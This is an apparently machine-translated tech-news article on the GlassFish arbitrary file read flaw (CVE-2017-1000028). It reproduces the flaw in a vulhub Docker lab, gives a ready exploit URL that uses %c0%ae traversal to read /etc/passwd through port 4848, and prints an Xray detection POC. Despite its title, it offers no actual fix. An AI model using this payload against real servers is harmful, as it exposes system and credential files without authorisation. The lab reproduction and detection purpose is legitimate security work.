How to fix the vulnerability of reading arbitrary files in GlassFish 01/17 Update SLTechnology News&Howtos

How to fix the vulnerability of reading arbitrary files in GlassFish

2025-01-17 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Shulou(Shulou.com)05/31 Report--

Editor to share with you how to fix GlassFish arbitrary file reading vulnerabilities, I believe most people do not know much about it, so share this article for your reference, I hope you can learn a lot after reading this article, let's go to know it!

GlassFish arbitrary file read vulnerability

Port: 4848

Loophole principle

Glassfish is a cross-platform open source application server written by java.

In the java language,% c0%ae is parsed to\ uC0AE and finally escaped to the. (dot) of the ASCCII character. Use% c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/ to jump up to achieve the effect of directory traversal and arbitrary file reading. So glassfish this poc is actually.. / etc/passwd.

Affect the version:

< 4.1.1 (excluding 4.1.1)

Loophole recurrence

The following test environment uses the docker image of vulhub, with the link of Master P attached: https://github.com/vulhub/vulhub teacher

Compile and run the test environment. The super administrator password of this environment is set in docker-compose.yml and defaults to vulhub_default_password. The password can be used to log in to the administrator account on port 4848.

Docker-compose up-d

After the environment is running, visit http://your-ip:8080 and http://your-ip:4848 to view the web page. Among them, port 8080 is the website content and port 4848 is the GlassFish management center.

Access https://your-ip:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd directly without logging in The / etc/passwd content was found to have been read successfully:

POC & EXP

The following is Xray's POC, which only traverses the parent directory, detects version information, and does not involve sensitive information, but also verifies the existence of vulnerabilities.

Name: poc-yaml-glassfish-cve-2017-1000028-lfirules:-method: GET path: / theme/META-INF/%c0%ae%c0%ae/META-INF/MANIFEST.MF follow_redirects: true expression: | response.status = = 200 & & response.body.bcontains (b "Ant-Version:") & & response.body.bcontains (b "Manifest-Version:") detail: version:

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.